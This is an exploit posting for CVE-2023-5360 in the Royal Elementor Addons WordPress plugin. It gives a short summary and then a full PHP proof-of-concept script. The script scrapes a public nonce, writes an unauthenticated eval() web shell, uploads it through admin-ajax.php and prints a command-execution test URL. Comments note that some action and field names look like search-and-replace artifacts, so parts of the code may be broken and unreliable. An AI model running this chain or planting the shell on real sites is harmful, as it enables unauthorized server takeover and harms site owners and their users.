WordPress Royal Elementor Addons 1.3.78 Shell Upload
=============================================================================================================================================
| # Title WordPress Royal Elementor Addons 1.3.78 Shell Upload
=============================================================================================================================================
| # Title : WordPress Royal Elementor Addons 1.3.78 RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://downloads.wordpress.org/plugin/royal-elementor-addons.1.3.78.zip |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/190313/ & CVE-2023-5360
[+] Summary
The Royal Elementor Addons plugin for WordPress (<= 1.3.78) improperly
validates file-upload requests and exposes the upload nonce to every
visitor through the global JavaScript variable "WprConfig".
The plugin registers an AJAX action used for uploading files associated
with various UI elements. The weakness lies in:
1. Exposure of the file-upload nonce inside the website's HTML, readable
without authentication (a nonce is a CSRF token, not an access control).
2. Incomplete server-side validation of file type and file origin.
3. Lack of authentication or capability checks around the upload endpoint,
so unauthenticated requests reach the handler.
Theoretical attack sequence (documented for awareness):
- Step 1: Attacker retrieves page HTML.
- Step 2: Extracts nonce from `var WprConfig = {...}`.
- Step 3: Sends crafted POST request to admin-ajax.php.
- Step 4: Server incorrectly processes upload without capability checks.
[+] poc :
usage : php poc.php http://target/ [shell_file]
<?php
/* ========================================================================
Royal Elementor Addons <= 1.3.78 - Full RCE Chain (PHP Version)
Compatible: Windows / Linux / macOS
Requirements: PHP CLI with the curl extension only (no other extensions
or commonly disabled functions are used)
=========================================================================*/
/* ----------------------------------------------------------------------
SAFE HTTP GET (CURL)
------------------------------------------------------------------------*/
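/**
 * Fetch a URL with cURL and return the response body.
 *
 * @param string $url Absolute http(s) URL to fetch.
 * @return string|null Response body, or null when the transfer fails
 *                     (unsupported scheme, DNS/connect error, timeout).
 */
function safe_http_get(string $url): ?string
{
    $ch = curl_init();
    if ($ch === false) {
        return null;
    }
    curl_setopt_array($ch, [
        CURLOPT_URL            => $url,
        CURLOPT_RETURNTRANSFER => true,
        // Deliberate for a PoC against lab targets with self-signed certs.
        // It also makes this request trivially interceptable; re-enable
        // verification before pointing the tool at anything over the internet.
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_FOLLOWLOCATION => true,
        // libcurl follows redirects without limit by default; cap it so a
        // redirect loop cannot burn the whole timeout budget.
        CURLOPT_MAXREDIRS      => 5,
        // Only speak http/https, including after a redirect, so a hostile
        // target cannot bounce us to file:// or another local scheme.
        CURLOPT_PROTOCOLS       => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 10,
        CURLOPT_TIMEOUT        => 10,
    ]);
    $resp = curl_exec($ch);
    curl_close($ch);
    // curl_exec() yields false on transport failure; normalise to null so the
    // caller's `!$html` check keeps working and the return type is honest.
    return $resp === false ? null : $resp;
}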
/* ----------------------------------------------------------------------
Extract nonce from: var WprConfig = {...};
------------------------------------------------------------------------*/
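/**
 * Extract the upload nonce from a page's `var WprConfig = {...};` blob.
 *
 * Tries strict JSON first; falls back to a direct regex on the `nonce` key
 * when the object is valid JavaScript but not valid JSON (trailing comma,
 * unquoted key), which previously made json_decode() return null and the
 * tool misreport the target as patched.
 *
 * @param string $html Raw HTML of the target page.
 * @return string|null Nonce string, or null when none is present.
 */
function wpr_nonce_from_html(string $html): ?string
{
    if (!preg_match('/var\s+WprConfig\s*=\s*({.*?});/s', $html, $match)) {
        return null;
    }
    $cfg = json_decode($match[1], true);
    if (is_array($cfg) && isset($cfg["nonce"]) && is_string($cfg["nonce"]) && $cfg["nonce"] !== '') {
        return $cfg["nonce"];
    }
    if (preg_match('/["\']nonce["\']\s*:\s*["\']([^"\']+)["\']/', $match[1], $n)) {
        return $n[1];
    }
    return null;
}

/**
 * Fetch the target's front page and return the exposed WprConfig nonce.
 *
 * @param string $target Base URL of the WordPress site.
 * @return string|null Nonce, or null when the page is unreachable or
 *                     does not expose one (plugin absent or patched).
 */
function get_nonce_from_target(string $target): ?string
{
    $html = safe_http_get($target);
    if (!$html) {
        return null;
    }
    return wpr_nonce_from_html($html);
}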
/* ----------------------------------------------------------------------
Generate Safe Default RCE Shell (Temp File)
------------------------------------------------------------------------*/
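/**
 * Write the default PHP payload to a temp file and return its path.
 *
 * WARNING: the payload is an *unauthenticated* eval() backdoor — anyone who
 * can reach the uploaded URL gets code execution on the target. Remove it
 * from the target as soon as the engagement step is done, or replace it with
 * a payload gated behind a secret before use outside a lab.
 *
 * @return string Path of the generated file on the local machine.
 * @throws RuntimeException When the temp file cannot be written.
 */
function generate_indoushka_shell(): string
{
    $path = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "indoushka_shell_" . uniqid() . ".php";
    $payload = '<?php echo "Indoushka RCE - ";';
    $payload .= 'if(isset($_GET["cmd"])) { @eval($_GET["cmd"]); } ?>';
    // Previously the return value was ignored, so a read-only temp dir
    // surfaced later as an opaque upload failure.
    if (file_put_contents($path, $payload) === false) {
        throw new RuntimeException("Unable to write payload to {$path}");
    }
    return $path;
}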
/* ----------------------------------------------------------------------
Upload PHP File using AJAX (ph_p mutated extension)
------------------------------------------------------------------------*/
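/**
 * POST the payload to admin-ajax.php through the plugin's upload action.
 *
 * @param string $target    Base URL of the WordPress site.
 * @param string $nonce     Nonce taken from WprConfig.
 * @param string $file_path Local path of the file to upload.
 * @return string|null URL of the stored file as reported by the handler
 *                     (`data.url` in the JSON reply), or null on any failure.
 */
function indoushka_upload_shell(string $target, string $nonce, string $file_path): ?string
{
    // curl_file_create() on a missing file only fails deep inside curl_exec;
    // check up front so the caller gets a clear "no file" instead of "patched".
    if (!is_readable($file_path)) {
        return null;
    }
    $ajax = rtrim($target, "/") . "/wp-admin/admin-ajax.php";
    // NOTE(review): the action name and file-field name below contain the
    // author's handle and read like a search-and-replace artifact. Confirm
    // them against the plugin's wp_ajax_nopriv_* registration before relying
    // on this: with a wrong action admin-ajax.php replies "0" and the tool
    // reports a false "patched".
    $fields = [
        "action" => "wpr_addons_indoushka_file",
        "max_file_size" => 0,
        // Client-supplied extension whitelist — the core of the weakness:
        // the handler honours this value instead of a server-side list.
        "allowed_file_types" => "ph_p",
        "triggering_event" => "click",
        "wpr_addons_nonce" => $nonce
    ];
    // A `.ph_p` file only executes where the web server maps that suffix to
    // the PHP handler; elsewhere it is served as inert bytes. Check the
    // returned URL with a GET before assuming RCE.
    $file = [
        "indoushkaed_file" => curl_file_create(
            $file_path,
            "application/octet-stream",
            "rce_mutated.ph_p"
        )
    ];
    $ch = curl_init();
    if ($ch === false) {
        return null;
    }
    curl_setopt_array($ch, [
        CURLOPT_URL            => $ajax,
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => array_merge($fields, $file),
        CURLOPT_RETURNTRANSFER => true,
        // Same lab-only tradeoff as safe_http_get(): no TLS verification.
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        // The original had no timeout, so a slow target hung the tool forever.
        CURLOPT_CONNECTTIMEOUT => 10,
        CURLOPT_TIMEOUT        => 30,
    ]);
    $resp = curl_exec($ch);
    curl_close($ch);
    if (!is_string($resp) || $resp === '') {
        return null;
    }
    $json = json_decode($resp, true);
    if (!is_array($json)) {
        return null;
    }
    $url = $json["data"]["url"] ?? null;
    return is_string($url) && $url !== '' ? $url : null;
}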
/* ----------------------------------------------------------------------
MAIN EXECUTION
------------------------------------------------------------------------*/
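// ---------------------------------------------------------------------------
// MAIN: usage check -> nonce discovery -> payload selection -> upload.
// Exit status is 0 only when a URL came back; every failure path exits 1 so
// the tool can be scripted (the original exited 0 on usage and nonce errors).
// ---------------------------------------------------------------------------
if ($argc < 2) {
    echo "Usage:\n php " . $argv[0] . " http://target.com/ [shell.php]\n";
    exit(1);
}
$target = $argv[1];
$custom_shell = $argv[2] ?? null;

// Reject anything that is not an http(s) URL before it reaches cURL.
if (filter_var($target, FILTER_VALIDATE_URL) === false
    || !in_array(strtolower((string) parse_url($target, PHP_URL_SCHEME)), ['http', 'https'], true)) {
    echo "[-] Target must be an absolute http:// or https:// URL.\n";
    exit(1);
}

echo "=== Royal Elementor Addons Full RCE PoC ===\n";
echo "[*] Extracting nonce from homepage...\n";
$nonce = get_nonce_from_target($target);
if (!$nonce) {
    // Either the page is unreachable or WprConfig is absent/patched.
    echo "[-] Failed to extract nonce. Target may be patched.\n";
    exit(1);
}
echo "[+] Nonce found: $nonce\n";

/* Shell Selection */
if ($custom_shell) {
    // Fail here rather than as an opaque upload failure later.
    if (!is_readable($custom_shell)) {
        echo "[-] Cannot read shell file: $custom_shell\n";
        exit(1);
    }
    echo "[*] Using provided shell: $custom_shell\n";
    $shell = $custom_shell;
} else {
    echo "[*] Generating default Indoushka RCE shell...\n";
    $shell = generate_indoushka_shell();
    echo "[+] Shell saved at: $shell\n";
}

echo "[*] Uploading shell via vulnerable AJAX handler...\n";
$url = indoushka_upload_shell($target, $nonce, $shell);
$status = 0;
if ($url) {
    echo "[+] Shell uploaded successfully!\n";
    echo "[+] URL: $url\n";
    // The default payload eval()s the raw `cmd` parameter, so a PHP
    // statement (not a shell command) goes here.
    echo "[>] Test: {$url}?cmd=system('id');\n";
} else {
    echo "[-] Upload failed. Target may be protected or patched.\n";
    $status = 1;
}
// Run marker only; it has no role in the exploit chain.
echo "Payload Variant: " . base64_encode("ALT-FINAL-" . microtime(true)) . "\n";
exit($status);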
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================